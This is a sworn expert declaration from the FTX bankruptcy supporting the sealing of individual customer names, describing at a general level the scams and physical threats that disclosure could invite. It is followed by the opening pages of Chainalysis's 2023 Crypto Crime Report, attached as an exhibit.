1. I am a Managing Director in the Blockchain and Digital Assets practice for FTI Consulting, Inc. ("<u>FTI Consulting</u>"). FTI Consulting is the financial advisor for the Official Committee of Unsecured Creditors (the "<u>Committee</u>") appointed in the above-captioned bankruptcy cases (the "<u>Chapter 11 Cases</u>") of the debtors (collectively, the "<u>Debtors</u>").

2. I submit this declaration (the "<u>Declaration</u>") in support of the *Joint Motion Of The Debtors And The Official Committee Of Unsecured Creditors For An Order Authorizing Movants To Redact Or Withhold Certain Confidential Information Of Customers And Personal Information Of Individuals*, filed contemporaneously herewith (the "<u>Motion</u>"), which seeks this Court's authority to redact and seal the names, addresses and email addresses of the Debtors'

---

[1] The last four digits of FTX Trading Ltd.'s tax identification number are 3288. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

customers who are natural persons (the "<u>Confidential Customer Information</u>"), from disclosure in the Chapter 11 Cases, subject to certain exceptions as set forth in the Motion.[2]

3.      The statements in this Declaration are true to the best of my knowledge, information and belief after a reasonable inquiry under the circumstances, and except where noted specifically, are based on my personal knowledge or on information that I have received from either the Committee and its professionals or other employees of FTI Consulting working directly with me or under my supervision, direction or control. Neither FTI Consulting nor I am being compensated specifically for this testimony beyond the compensation being provided to FTI Consulting as a Court-approved professional services firm employed by the Committee. If I were called upon to testify, I could and would competently testify to the facts and opinions set forth herein. I am authorized to submit this Declaration on behalf of the Committee.

4.      I have a Master's Degree in Public Administration, Criminal Justice from the University of Arizona. I have blockchain, cryptocurrency, and cybersecurity certifications from the Blockchain Council, Columbia University, Carnegie Mellon University, Information Systems Audit and Control Association (ISACA), and the Global Information Assurance Certificate (GIAC). I possess a Top Secret / Sensitive Compartmented Information security clearance. My resume is attached to this Declaration as **<u>Exhibit A</u>**.

5.      I specialize in investigations of financial crime involving complex, cyber-enabled fraud and have substantial experience investigating and analyzing illicit cryptocurrency transactions. These investigations require blockchain analytics and digital asset tracing to investigate transaction flows and assign attribution to individuals transacting on blockchains. I

---

[2]      I understand that there is no objection to the sealing of the physical addresses and email addresses of customers who are natural persons. Accordingly, the issue on the Motion is whether the names of such customers (the "<u>Individual Customer Names</u>"), should be redacted and sealed. Nevertheless and for the avoidance of doubt, it

also specialize in network intrusion, ransomware and cyber incident response operations. My investigative and regulatory expertise has been applied to protect the financial infrastructure of the United States, strengthen the safety and soundness of the digital asset ecosystem, protect the American public from cyber incidents and bring consequence to illicit actors operating in cyberspace. I am also skilled at regulatory, government and public affairs related to blockchain, cryptocurrency, digital asset strategy, policy, legislation, enforcement and regulation.

6.  For 24 years, from September 1997 to April 2022, I worked for the Office of Investigations for the United States Secret Service (the "Secret Service"), where I was promoted to Assistant Director on October 11, 2020. The Secret Service Office of Investigations is comprised of 162 offices and more than 3,000 personnel. As the Assistant Director, I led the global investigative mission of the Secret Service, which included safeguarding the financial systems of the United States from financial and cyber-based crimes, and served as an expert witness in congressional hearings related to cryptocurrency before both the United States Senate and United States House of Representatives. During my time with the Secret Service, I headed and worked on multiple investigations involving crimes that contained a blockchain and/or cryptocurrency component. A selection of my work is below:

(a)  I have been the primary (arresting) case agent for 60 state and federal financial crime investigations, resulting in 37 arrests with a 100% conviction rate;

(b)  I pioneered cyber investigative advancements and modernization for the Secret Service, including the implementation of an Integrated Investigations Operations Platform ("IIOP") to enhance data aggregation, migration and evaluation. These augmentations improved the agency's investigative capabilities through data processing efficiencies;

---

is my opinion that all of the potential harm that may befall a customer to the extent its name is disclosed would be magnified tenfold to the extent its physical addresses and email addresses is disclosed as well.

(c)     I established the Secret Service's first dedicated illicit finance and digital asset tracing team to conduct investigations into illicit financial activity involving cryptocurrency and other forms of digital payments;

(d)     I directed the analysis of approximately 1381.25 terabytes of data, 145,971 digital forensic exams, and 696 network intrusion investigations related to financial fraud;

(e)     I had oversight of the National Computer Forensics Institute, the only United States government federal facility which trains and equips the nation's state, local, territorial and tribal law enforcement officers in cyber forensic investigations;

(f)     I led the agency's investigative teams to prevent approximately $5.825 billion in cyber and financial crime loss, executed 1,590 arrests for financial crimes and investigated 13,171 criminal and protective intelligence cases; and

(g)     I directed the return of approximately $3.28 billion of seized funds to financial institutions and private citizens who were victims of financial crimes.

7.     After my retirement from the Secret Service, and just prior to joining FTI, I was the Vice President of Regulatory Affairs for Prime Trust, LLC ("Prime Trust"). Prime Trust is a software-as-a-service financial infrastructure company, which provides application programming interface ("API") services for business-to-business digital asset transactions, such as qualified custody, payment rails, indemnity, liquidity and settlement services. Prime Trust is a licensed custodian for more than 200 individual digital tokens, processing up to 300 million API calls per month, and settling up to $3.5 billion in transactions per month. At Prime Trust, I partnered with legislators, enforcement agencies and regulators for legislative action and government engagement in the digital asset industry. I also led Prime Trust's Legal and Compliance departments in regulatory affairs.[3]

---

[3]    FTX was a customer of Prime Trust. During my short tenure at Prime Trust, my only involvement with FTX was to assist with response to media inquiries related to our processing of FTX customer funds.

4

**A0244**

8.     In my experience, malefactors often use cryptocurrency to facilitate financial fraud.  I have substantial experience investigating and analyzing such illicit cryptocurrency transactions.   Similarly, I have become familiar with the methods and tactics malefactors commonly use to target businesses and individuals for illicit activity.  Based on my experience, as well as my understanding of the Debtors' prepetition activities and the high profile nature of these proceedings, I believe that revealing the Individual Customer Names imposes a severe and unusual risk of identity theft, asset theft, personal attack, and further online victimization.  These risks are heightened with respect to the Debtors' customers because malefactors typically target (x) consumers they believe to be holders of cryptocurrency and (y) consumers who are in a vulnerable state, including because they have sums of money tied up in bankruptcy proceedings.

9.     Identity and asset theft schemes are often extremely successful using blind or blanket attack methods, where the malefactor has no background information on their victims.  These crimes become significantly more effective when malefactors employ targeted approaches equipped with some measure of background or personal information about the victim.  In that regard, even if only Individual Customer Names are disclosed, through combining a customer name with other publicly available sources—*i.e.*, a malefactor can correlate additional information from public databases, including telephone numbers, home addresses, email addresses, places of employment, social media presence, associates, etc.—a malefactor will be able to harvest a full target biography of a customer, *i.e.*, a customer dossier.  This dossier vastly increases the malefactor's probability of success in committing a crime against these targets based on the ability to implement bespoke attack vectors and techniques.  Although customers with extremely common names may be afforded slightly more protection against a malefactor who tries to locate the customer's online presence, simply being able to tie a name to a certain

trait—such as an individual who holds and invests in cryptocurrency—can significantly increase the likelihood that a malefactor may locate an individual's online presence and information, and thus provide the malefactor the opportunity to create a customer dossier.

10. Odds of success for identify and asset theft crimes are increased even further if they are committed against vulnerable persons, such as the Debtors' customers in these Chapter 11 Cases, whose circumstances provide greater opportunity to, or reduced defense against, the malefactor. Some of the Debtors' individual customers may be vulnerable due to the monetary losses they have experienced resulting from the misconduct and alleged fraud by the Debtors' former management.[4]

**A. *Disclosure of Individual Customer Names, Creates an Undue Risk of Identify Theft or Unlawful Injury.***

11. In my experience, cryptocurrency offers several opportunities to malefactors seeking to commit illicit activities. It serves as a distributed, instantaneous transfer of value that does not provide the immediate identity of its user and can serve as both the method and the means to conduct illicit activity. As such, malefactors target known cryptocurrency holders for scams. If Individual Customer Names are made public in these Chapter 11 Cases, such information will provide potential malefactors an itemized list of vulnerable targets.[5] In particular, it will provide malefactors with a menu of potential targets via disclosure of the Debtors' schedules of assets and liabilities list (if the Individual Customer Names are not redacted), and each of the Debtors' customers' respective cryptocurrency holdings. By making

---

[4] *See* **Exhibit B**. Erika Harrell, *Victims of Identity Theft, 2018*, BUREAU OF JUSTICE STATISTICS (Apr., 2021), at 11, https://bjs.ojp.gov/library/publications/victims-identity-theft-2018 (discussing percentages of victims who reported emotion distress after experiencing identity theft).

the names of the Debtors' customers public, these schedules would serve to identify individual customers of the Debtors who hold relatively larger amounts of cryptocurrency, thereby placing a target on their back and facilitating fraudulent schemes by malefactors.

12.    Moreover, as mentioned above, the likelihood of successfully executing a cybercrime is vastly increased if the malefactor has knowledge of their target.  This is evidenced in the most prevalent types of online financial fraud scams.

13.    <u>Business Email Compromise</u> ("<u>BEC</u>").  BECs exploit knowledge of the target's personal and professional online business activity.  In these schemes, the malefactor will send the target an email message that appears to be a legitimate request for some business function, such a payment of an invoice or wiring of funds to complete a transaction.  Knowledge of the target's personal details is integral to the execution of this scheme, such that the Federal Bureau of Investigation's first recommended safeguard against them is to "[b]e careful with what information you share online . . . ."[6]

14.    <u>Romance Scams</u>.  Romance scams are those in which the malefactor pretends to build a romantic relationship with the victim in order to convince them or guilt them in to sending them money.  The backbone of these scams is establishing an online connection and rapport with the target.  Malefactors are successful at these scams when they are conducted with random targets with no intelligence related to their identity.  A directed romance scam based on knowledge of the target's identity exponentially increases the likelihood of these attacks being

---

[5]    *See* **Exhibit C**.  Zhiyuan Sun, *Crypto Users Claim Gemini Email Leak Occurred Much Earlier Than First Reported*, COINTELEGRAPH, (Dec. 14. 2022), https://cointelegraph.com/news/crypto-users-claim-gemini-email-leak-occurred-much-earlier-than-first-reported (reporting that multiple customers of the cryptocurrency exchange Gemini received phishing emails after Gemini experienced a leak of customer emails and partial phone numbers).

[6]    *See* **Exhibit D**.  *Business Email Compromise*, FBI, https://www.fbi.gov/how-we-can-help-you/safety-resources/scams-and-safety/common-scams-and-crimes/business-email-compromise (last visited Apr. 10, 2023).

successful.  The malefactors who are able to perform reconnaissance to see which victims have the most investment potential are those most likely to execute the fraud.[7]

15.   <u>Pig Butchering</u>.   The practice of increasing a victim's cryptocurrency account, known as "fattening" before draining of all funds, is called "Pig Butchering".  This scam has grown rapidly in the past year and cost U.S. victims "more than $429 million in losses" in 2022.[8] These scams are perpetrated by malefactors who form online relationships with their targets, convince them to invest in cryptocurrency accounts, and then steal the invested funds.  In most of these schemes, the malefactor doesn't know their target prior to executing the fraud and has to persuade them to set up a cryptocurrency wallet.  Both of these requirements will be eliminated with the release of Individual Customer Names, as the malefactor will be able to specifically identify their target as someone who is already versed in cryptocurrency and who already has a cryptocurrency wallet established.

16.   <u>Phishing Attacks</u>.   There are multiple types of phishing attacks, including cryptocurrency credential harvesting, cryptocurrency transfer solicitation and commodity stealers that target cryptocurrency values.  Phishing involves the malefactor posing as a known or trusted entity through an email, text message or instant message.  A malefactor can easily pose as a known entity to increase the appearance of legitimacy by including that entity's logo, color scheme or other identifying attributes.  Even more effective is to purport legitimacy by including personal information about the target in the phishing message from which, based on the malefactor's misrepresentation, the target provides sensitive personal, business or financial

---

[7]   *See* **Exhibit E**.   The 2023 Crypto Crime Report, CHAINALYSIS, (Feb. 2023), at 87 and 100, https://go.chainalysis.com/2023-crypto-crime-report (explaining that scammers often perform reconnaissance on potential victims).

[8]   *See* **Exhibit F**.   Robert McMillan, *A Text Scam Called 'Pig Butchering' Cost Her More Than $1.6 Million*, WALL ST. J. (Oct. 20, 2022), https://www.wsj.com/articles/a-text-scam-called-pig-butchering-cost-her-more-than-1-6-million-11666258201.

information.   This information can be provided by the target directly in a response to the imposter or indirectly by clicking on a link that allows the malefactor unauthorized access to the target's device (a "Trojan") or injects some other form of malware or virus to infect the target's device.  With access to the target's network, the malefactor can then obtain account information, change permissions and authorizations for further illicit activity, transfer funds into their possession, and send sensitive information from the targeted account holders' infected device to the malefactor.  I have seen phishing attacks in my professional experience used, and succeed, in obtaining both victims' account credentials and their private keys to online wallets containing cryptocurrency.  These attacks do not require a high degree of sophistication and are facilitated by phish kits that can be used to create fraudulent landing pages[9] with pre-packaged sets of code, graphics and configuration files.  The only missing element to these kits is the target of the attack, which will be available if the Individual Customer Names are disclosed in these Chapter 11 Cases.

17.   Account Spoofing.   Spoofing entails a malefactor disguising an email address, display name, phone number, text message, or website URL to convince a target that the source of the message is a legitimate entity.  A malefactor could target one of the Debtors' customers, locate their email address from other public sources and contact them from a spoofed email address that appears to relate to the proceedings in these Chapter 11 Cases.  A customer of the Debtors is less likely to be suspicious of emails that appear to be related to these Chapter 11 Cases—and thus unlikely to notice the minor errors in domain names that might alert them to the fraud—if the emails target the account holder based on the malefactor's knowledge of their cryptocurrency holdings and the circumstances of this case.

---

[9]   *See* **Exhibit G**.  Jared Peck, *Have Money for a Latte? Then You Too Can Buy a Phish Kit,* PROOFPOINT, (Dec. 16, 2021), at 5, https://www.proofpoint.com/us/blog/threat-insight/have-money-latte-then-you-too-can-buy-

18.     Again, the success of this scheme will be significantly enhanced if the spoofed message contains the target's personally identifiable information, such as Individual Customer Names, which the target perceives as indicia of authenticity.  This increased risk is not merely speculative or conjecture.  In the currently ongoing cryptocurrency bankruptcy case of *In re Celsius Network LLC* ("Celsius"), the names of Celsius' customers were made public. Subsequently, many Celsius customers became the target of phishing attacks by scammers posing as bankruptcy lawyers using emails and phone calls.[10]  These examples of phishing attacks targeting the Celsius customers ranged from simple attempts to connect over messaging applications, to sophisticated emails using Celsius logos and impersonating legal counsel, and in one instance resulted in the bankruptcy court involving the U.S. Marshal.[11]  Even though Celsius customer email addresses and phone numbers were redacted, malefactors were still able to reach customers based solely upon the disclosed names.  An even greater risk of attacks exists in the Chapter 11 Cases if Individual Customer Names are disclosed because there are approximately *9 million* customer accounts on the Debtors' exchanges as compared to the approximately 1.7 million registered users in Celsius, of which only approximately 300,000 are active users that

---

phish-kit.

[10]     *See* **Exhibits H**.     James Nani, *Scammers, Posing as Kirkland Lawyers, Phishing Celsius Customers,* BLOOMBERG LAW (Dec. 1, 2022), https://news.bloomberglaw.com/bankruptcy-law/scammers-posing-as-kirkland-lawyers-phishing-celsius-customers (reporting on phishing attempts that occurred after the unsealing of customer names in the Celsius bankruptcy proceeding); *see also* **Exhibit I**.  *Notices of Phishing Attempts*, *In re Celsius Network LLC*, Case No. 22-10964 (MG) (Bankr. S.D.N.Y.) [Docket Nos. 1527, 1681, 1904, 1992 and 2082].

[11]     The attack in question involved a phishing attempt in which malefactors sent emails to Celsius customers, purportedly from the claims agent in that case, requesting additional personally indefinable information from customers and requiring a filing fee and tax fee to be paid.  The email address used by the scammers to send the phishing attempt came from "celsius@cases.stretto.restructuring.ltd", which is similar to the domain name of the official claims agent in the Celsius cases.  As part of the scam, an order from the Celsius bankruptcy court was attached, which had been modified to include false information, thereby making it appear that that the request for personal information and fees was legitimate.  *Supra* **Exhibit I**, *Second Supplemental Notice of Additional Phishing Attempts*, *In re Celsius Network LLC*, Case No. 22-10964 (MG) (Bankr. S.D.N.Y. Jan. 12, 2023) [Docket No. 1904]; s*ee also* **Exhibit J**.  Hr'g Tr. (Feb. 6, 2023) at 17:9-16, *In re Celsius Network LLC*, Case No. 22-10964 (MG) (Bankr. S.D.N.Y. Feb. 6, 2023) [Docket No. 2016].

hold an account balance of more than $100.[12]   Moreover, I know from experience that a malefactor will more easily be able to steal private keys or cryptocurrency from wallets by obtaining the necessary information from the target via account spoofing.

19.   Each of the aforementioned financial fraud scams, BEC, Romance Scams, Pig Butchering, Phishing attacks, and Spoofing relies on the malefactor impersonating a trusted entity.   Historically, these efforts have been hampered by linguistic, grammatical, or content errors committed by the malefactor, especially those in foreign locations.   Simply put, the malefactor makes errors in the impersonation message that raise suspicion in their target and prevent the scheme from being successful.   However, the arrival and refinement of artificial intelligence programs, such as ChatGPT, a language model that can generate, proofread and enhance technical writings (including emails), has further propelled the success of these impersonation attacks by essentially eliminating previous telltale signs of poor grammar, typos, and recycled material/narratives.[13]   This further increases both the likelihood of phishing emails bypassing spam filters and the success of the attack itself against individuals.   Furthermore, the Debtors' customer base contains a large number of foreign individuals, who may not be familiar with the U.S. bankruptcy process.   This lack of familiarity increases the risk and likelihood of a customer falling victim to one of the above scams or attacks because a customer may not realize that the Debtors would never request certain information from their customer base, such as their account password or private keys.

---

[12]   *See Declaration of Alex Mashinsky, Chief Executive Officer of Celsius Network LLC, in Support of Chapter 11 Petitions and First Day Motions*, ¶ 9, *In re Celsius Network LLC, et al.,* Case No. 22-10964 (MG) (Bankr. S.D.N.Y. July 14, 2022) [Docket No. 23].

[13]   *See* **Exhibit K**.   Mark Sweney, *Darktrace Warns of Rise in AI-Enhanced Scams since ChatGPT Release*, THE GUARDIAN, (Mar. 8, 2023), https://www.theguardian.com/technology/2023/mar/08/darktrace-warns-of-rise-in-ai-enhanced-scams-since-chatgpt-release (reporting on the warning of cybersecurity firm Darktrace concerning an increase in criminals using artificial intelligence to create sophisticated and convincing scams since the launch of ChatGPT in November, 2022).

20.    <u>SIM Swapping</u>.  SIM swapping is when a malefactor gains access to a target's cellphone, which allows the malefactor to receive communications associated with the target's phone number, including those that involve multi-factor authentication ("<u>MFA</u>").  MFA is predominantly used to access financial accounts.  To accomplish SIM swapping, a malefactor transfers the target's cell phone number to another device without authorization through the target's wireless provider, and the wireless provider is tricked into conducting this transfer based on the malefactor's impersonation of the target.  This impersonation is carried out through various forms of social engineering conducted by the malefactor, wherein they convincingly act as the true owner of a cellphone account with the wireless provider.  In this scenario, the malefactor's odds at claiming to be the authorized account holder are vastly increased if they are able to provide accurate personal information about the authorized account holder.  Malefactors are able to complete this illicit activity even if armed solely with an account holder's name, as there are numerous online avenues to search for cellphone numbers by name only and U.S. carriers have a poor track record of preventing these attacks.  Additionally, most providers of online cryptocurrency wallets rely on MFA via text messaging for a number of account functions, including resetting passwords, conducting transactions and gaining access to the wallets or private keys.  A malefactor who has obtained a SIM swapped device can effortlessly authenticate and obtain access to the contents of the phone belonging to the targeted account holder, including private keys to wallets containing cryptocurrency.[14]  In my experience, SIM swapping is a particularly effective fraud scheme as it circumvents and leverages the perceived austere security mechanism of MFA.

---

[14]    *See* **Exhibit R,** *Lorenzo Franceschi-Bicchierai  Cops Arrest Infamous SIM Swapper Who Allegedly Stole $14 Million in Cryptocurrency* (Oct. 11, 2018), https://www.vice.com/en/article/7x3may/cops-arrest-sim-swapper-14-million-cryptocurrency (reporting on a sim swapping scheme where $14 million in cryptocurrency was stolen).

21.     <u>Physical Threats</u>.  Finally, in addition to online financial fraud scams, customers of the Debtors whose Individual Customer Names are disclosed may face physical threats, such as robberies, stalking, vandalism, cyber-bullying, and other threats of violence.[15]  There have been notable recent reports of kidnappings in which victims are targeted because they are known to hold a large amount of cryptocurrency.  In my experience and in investigations I have conducted involving targeted violence, these cases often involve subjects suffering from mental disorders preying on targets who often are identified through online information connected to high profile events.  Disclosing Individual Customer Names would expose some customers to this type of aggression.[16]

22.     Beyond the potential for physical harm, emotional distress, cyber threats, kidnapping, stalking, and bullying that could occur, malefactors could likely determine the physical addresses of the Debtors' customers as a result of disclosure of Individual Customer Names.  In my opinion and experience, known holders of cryptocurrency are frequently targeted because malefactors are cognizant that cryptocurrency assets are easy to liquidate and very difficult to trace.[17]

---

[15]     *See* **Exhibit L**.  Francisco Memoria, *Victim of Brazil Bitcoin Ransom Kidnapping Plot Rescued*, CCN, (last modified on Mar. 4, 2021), https://www.ccn.com/victim-of-brazilian-bitcoin-ransom-kidnapping-rescued (reporting that a woman married to a cryptocurrency businessman in São Paulo, Brazil was kidnapped and ransomed for Bitcoin and another cryptocurrency, with police believing the victim was targeted specifically due to her ties with cryptocurrency)*; see also* **Exhibit M**.  Jamie Redman, *London Student Robbed at Knifepoint by 8 Thugs for $93k in Bitcoin*, BITCOIN.COM, (Sept. 25, 2021), https://news.bitcoin.com/london-college-student-robbed-at-knifepoint-by-8-thugs-for-93k-in-bitcoin (reporting that a student was robbed immediately after disclosing to a friend his ownership of Bitcoin).

[16]     *See* **Exhibit N**.  Chris Morris, *Some Teenagers Are Making a Fortune Trading Bitcoin—One Even Got Kidnapped Because of His Success*, FORTUNE, (Oct. 21, 2021), https://fortune.com/2021/10/21/trading-bitcoin-teenagers-kidnapped (reporting that a 14-year-old was kidnapped and beaten after publicly announcing his success in Bitcoin trading).

[17]     *See* **Exhibit O**.  Rob Davies, *'Crypto Muggings': Thieves in London Target Digital Investors by Taking Phones*, THE GUARDIAN, (May 8, 2022), https://www.theguardian.com/technology/2022/may/08/crypto-muggings-thieves-in-london-target-digital-investors-by-taking-phones (reporting that there have been multiple incidents of violent crimes, with thieves targeting cryptocurrency investors due to the irreversible nature of transfer of cryptocurrency).

13

A0253

**B.**     ***Malefactors Only Need Access to the Individual Customer Names in Order to Steal Customers' Identity or Produce Unlawful Injury.***

23.     If Individual Customer Names are disclosed (even if no other Confidential Customer Information is made available), malefactors can much more easily target the Debtors' customers.  Cryptocurrency fraud is easier to enact if malefactors have access to a target's name, because malefactors can then assemble and correlate other identifying information about an individual using various means, including social media, public and private databases, and other data sourced from past hacks.  For example, data breaches over the past decade involving, for example, Yahoo, LinkedIn, Facebook and Marriott have flooded illicit marketplaces with a treasure trove of personally identifiable information.[18]  Hackers have sold this information through encrypted chat groups or the dark web for pennies per record.  Additionally, the plethora of hacks occurring at other cryptocurrency companies, such as BaderDAO, BitMart, Binance, Bitfinex and KuCoin, adds to the volume of personally identifiable information and cryptocurrency-specific personally identifiable information available in illicit marketplaces.[19]  It is not difficult for malefactors to correlate all of this publicly available information, especially information that originates from cryptocurrency hacks, with disclosed Individual Customer Names.

24.     Furthermore, it is common for cryptocurrency holders to use multiple wallets or online platforms to store their cryptocurrency assets, as some wallets only support certain types of cryptocurrency and some online platforms only support limited types of transactions or services.  It is my understanding that a vast number of the Debtors' customers use other online

---

[18]    *See generally* **Exhibit P**.  Michael Hill, Dan Swinhoe, *The 15 Biggest Data Breaches of the 21st Century*, CSO, (Nov. 8, 2022), https://www.csoonline.com/article/2130877/the-biggest-data-breaches-of-the-21st-century.

[19]    *See generally* **Exhibit Q**.  *17 Biggest Crypto Heists of All Time*, COINTELEGRAPH, (Mar. 10, 2023), https://cointelegraph.com/explained/the-biggest-crypto-heists-of-all-time.

platforms or exchanges to hold digital assets (*e.g.*, Coinbase, Metamask, etc.). Therefore, disclosing Individual Customer Names will put at risk of attacks and schemes the cryptocurrency held by those individuals stored on non-Debtor exchanges.

25.     I know from experience that a malefactor who possesses the name of a person who holds cryptocurrency is enough to subject that person to BECs, romance scams, pig butchering, phishing, account spoofing, SIM swaps, physical attacks and other unlawful injury. These risks are material and exacerbated if other identifying information is obtained, such as physical address or email address. Although online attacks and cyber threats, stalking, and bullying are endemic in today's virtual world, the release of Individual Customer Names would greatly exacerbate such risks for the Debtors' customers. Perpetrators of frauds and online attacks are emboldened by, motivated from and attracted to high profile cases like the Chapter 11 Cases. Adding to this environment is the fact that cryptocurrency is already an attractive target for malefactors because it is easy to liquidate, instantaneous, global and pseudo anonymous. In that regard, disclosing the names of customers of a cryptocurrency exchange, is different, than, for instance, disclosing the names of creditors of a non-cryptocurrency related debtor. And while I understand that there is normally a presumption of transparency and disclosure in bankruptcy cases, the dangers I have described from disclosing Individual Customer Names serve to highlight the uniqueness of these cases. Therefore, I believe it is prudent to protect the Debtors' customers' identities by ensuring that those names are sealed, rather than accepting the significant risks that the Debtors' customers will be subject to criminal activity as a result of the disclosure of the Individual Customer Names.

15

A0255

I declare under penalty of perjury that the foregoing is true and correct.

Dated: April 19, 2023
Fairfax, Virginia

_____
Jeremy A. Sheridan

**Exhibit E**



**FEBRUARY 2023**

# The 2023 Crypto Crime Report

Everything you need to know about cryptocurrency-based crime

A0258

# Table of Contents

Introduction                                    3

Sanctions                                        9

Ransomware                                      26

Money Laundering                                41

Stolen Funds                                    55

Oracle Manipulation Attacks                     65

Darknet Markets                                 70

Scams                                           85

Pump and Dump Tokens                           104

# Introduction

**A0260**

# 2023 Crypto Crime Trends: Illicit Cryptocurrency Volumes Reach All-Time Highs Amid Surge in Sanctions Designations and Hacking

Every year, we publish our estimates of illicit cryptocurrency activity to demonstrate the power of blockchains' transparency – these kinds of estimates aren't possible in traditional finance – and to teach investigators and compliance professionals about the latest trends in cryptocurrency-related crime that they need to know about. What could those estimates look like in a year like 2022? Last year was one of the most tumultuous in cryptocurrency history, with several large firms imploding, including Celsius, Three Arrows Capital, FTX, and others — some amid allegations of fraud.

Those allegations make this year's Crypto Crime Report a bit tricky, as some feel that those businesses should be treated as criminal enterprises. Ultimately though, we don't include their trans-action volumes in our measures of illicit activity because our estimates are based solely on on-chain intelligence — we don't account for instances where, for example, off-chain bookkeeping may have been fraudulent. Plus, the bankruptcy and criminal cases associated with these collapses are still ongoing, so for the time being, we'll leave questions of criminality to the legal system.

The events of this year have made clear that although blockchains are inherently transparent, the industry has room for improvement in this respect. There are opportunities to connect off-chain data on liabilities with on-chain data to provide better visibility, and transparency of DeFi, where all transactions are on-chain, is a standard that all crypto services should strive to achieve. As more and more value is transferred to the blockchain, all potential risks will become transparent, and we will have more complete visibility.

For now though, we'll continue to focus on illicit activity that can be measured on-chain. Let's look at how the market tumult of 2022 affected cryptocurrency-based crime.



See endnote [1] for notes on this chart.

Despite the market downturn, illicit transaction volume rose for the second consecutive year, hitting an all-time high of $20.6 billion. We have to stress that this is a lower bound estimate — our measure of illicit transaction volume is sure to grow over time as we identify new addresses associated with illicit activity, and we have to keep in mind that this figure doesn't capture proceeds from non-crypto native crime (e.g. conventional drug trafficking involving cryptocurrency as a mode of payment). For example, last year we published that we found $14 billion in illicit activity in 2021 — we've now raised that figure to $18 billion, mostly due to the discovery of new crypto scams.

It's also worth keeping in mind that 43% of 2022's illicit transaction volume came from activity associated with sanctioned entities, in a year when OFAC launched some of its most ambitious and difficult-to-enforce crypto sanctions yet. Crypto exchange Garantex, which accounted for the majority of sanctions-related transaction volume last year, is a great example. OFAC sanctioned Garantex in April 2022, but as a Russia-based business, the exchange has been able to continue operating with impunity. Transactions associated with Garantex or any other sanctioned crypto service represent, at the very least, substantial compliance risk for businesses that are subject to U.S. jurisdiction, including fines and potential criminal charges.

A0262



Note: Sanctions-related transaction volume rose 152,844% from 2021 to 2022 – we do not include that on the graph above due to the scale issues it would create.

Transaction volumes fell across all of the other, more conventional categories of cryptocurrency-related crime, with the exception of stolen funds, which rose 7% year-over-year. The market downturn may be one reason for this. We've found in the past that crypto scams, for instance, take in less revenue during bear markets, likely because users are more pessimistic and less likely to believe a scam's promises of high returns at times when asset prices are declining. In general, less money in crypto overall tends to correlate with less money associated with crypto crime.

Overall, the share of all cryptocurrency activity associated with illicit activity has risen for the first time since 2019, from 0.12% in 2021 to 0.24% in 2022. [2]

A0263



This shouldn't come as a huge surprise. As one might expect, total transaction volume fell with the onset of the bear market, and as we showed above, illicit transaction volume grew slightly. In fact, we first spotted this trend back in August, when we noted that legitimate transaction volumes were declining faster than illicit volumes.

Overall, illicit activity in cryptocurrency remains a small share of total volume at less than 1%. It's also worth keeping in mind that despite this year's jump, crime as a share of all crypto activity is still trending downwards. Keep reading, and we'll dig into the details of the criminal activity behind that 0.24%, as well as what our on-chain analysis reveals about the market failures of the last year.

## Endnotes:

[1] Notes on our illicit transaction volume chart:

- These are lower bound estimates that will likely rise over time as additional illicit activity is discovered.
- This does not include off-chain criminal activity where proceeds may have been moved into crypto for laundering, though that activity can still be traced.
- This does not include volumes associated with centralized services that collapsed in 2022, some of which are facing charges of fraud, given lack of off-chain insights.
- Funds received by sanctioned entity Garantex accounts for much of 2022's illicit volume. While most of that activity is likely Russian users using a Russian exchange, most compliance professionals treat this as illicit activity.

[2] For those keeping a close eye on our annual analyses, you may be surprised to find that our estimate for the illicit share of all cryptocurrency transaction volume for 2021 actually decreased from the number we published in last year's report – 0.15% to 0.12%. Don't these estimates usually increase over time, as mentioned above? In this case, our denominator – total volume analyzed – increased as we added mature support for additional blockchains.

# Sanctions

# How 2022's Biggest Cryptocurrency Sanctions Designations Affected Crypto Crime

Agencies like the Office of Foreign Assets Control (OFAC) of the U.S. Department of the Treasury and its equivalents in other countries implement sanctions through the targeting of countries, regimes, individuals, and entities that are considered threats to national security and foreign policy. Traditionally, sanctions enforcement relies on the cooperation of mainstream financial institutions, but some bad actors have turned to cryptocurrency to circumvent these third party intermediaries, giving policymakers and sanctioning bodies new challenges with which to grapple. However, cryptocurrency's inherent transparency, along with the willingness of compliant cryptocurrency services — in particular, the many centralized exchanges that function as the link between crypto and fiat — have demonstrated that sanctions enforcement is possible in the crypto world.

In this section, we'll look at how the U.S. government's crypto-related sanctions strategy has evolved over time, examine the types of entities that it has sanctioned so far, and analyze the impact of those sanctions on the entities themselves and the wider crypto crime ecosystem.

## OFAC's cryptocurrency-related sanctions are on the rise since 2021

2018 saw OFAC's first crypto-related sanctions, when it designated two Iranian nationals associated with the SamSam ransomware strain and included Bitcoin addresses linked to the individuals as identifiers on their Specially Designated Nationals And Blocked Persons (SDN) List entries. For the next two years, virtually all cryptocurrency addresses included as sanctions identifiers were personal wallet addresses controlled by individuals, with an average of two addresses per crypto-related designation in 2018, four in 2019, and nine in 2020.



That changed starting in 2021 though, when OFAC began to designate entire crypto services as opposed to just individual bad actors — overall, the average number of addresses per sanctioned entity reached 35 by 2022, with some designations containing over 100 cryptocurrency addresses as identifiers. As seen below with the expanding funnel of sanctioning activity, OFAC's efforts have increased across three dimensions, targeting larger entities and services, more diverse service types, and doing so for a wider array of reasons.

A0268



**Timeline of OFAC crypto-related sanctions designations, 2018–2022**

A0269

2022 has seen some of OFAC's biggest cryptocurrency service designations to date. Three in particular are notable not just due to their size, but also in how each highlights unique challenges in enforcing sanctions against different types of crypto entities: darknet market Hydra, decentralized mixer Tornado Cash, and Russia-based cryptocurrency exchange Garantex. But before we get into those, we'll provide an overview of all crypto-related sanctions designations over the last year.

## Sanctioned crypto-linked entities in 2022: Who they are and what they do

Here's the breakdown of the individuals and entities with cryptocurrency nexuses sanctioned in the U.S. in 2022, along with the reason OFAC sanctioned them.

| Name | Reason for sanction |
|------|---------------------|
| Lazarus Group | Hacking and crypto theft on behalf of North Korean government |
| Ahmad Khatibi Aghada | Ransomware |
| Amir Hossein Nikaeen Ravari | Ransomware |
| Alex Adrianus Martinus Peijnenburg | Drug trafficking |
| Matthew Simon Grimm | Drug trafficking |
| Hydra Marketplace | Darknet market and money laundering |
| Garantex | Money laundering |
| Blender.io | Money laundering |
| Tornado Cash | Money laundering |
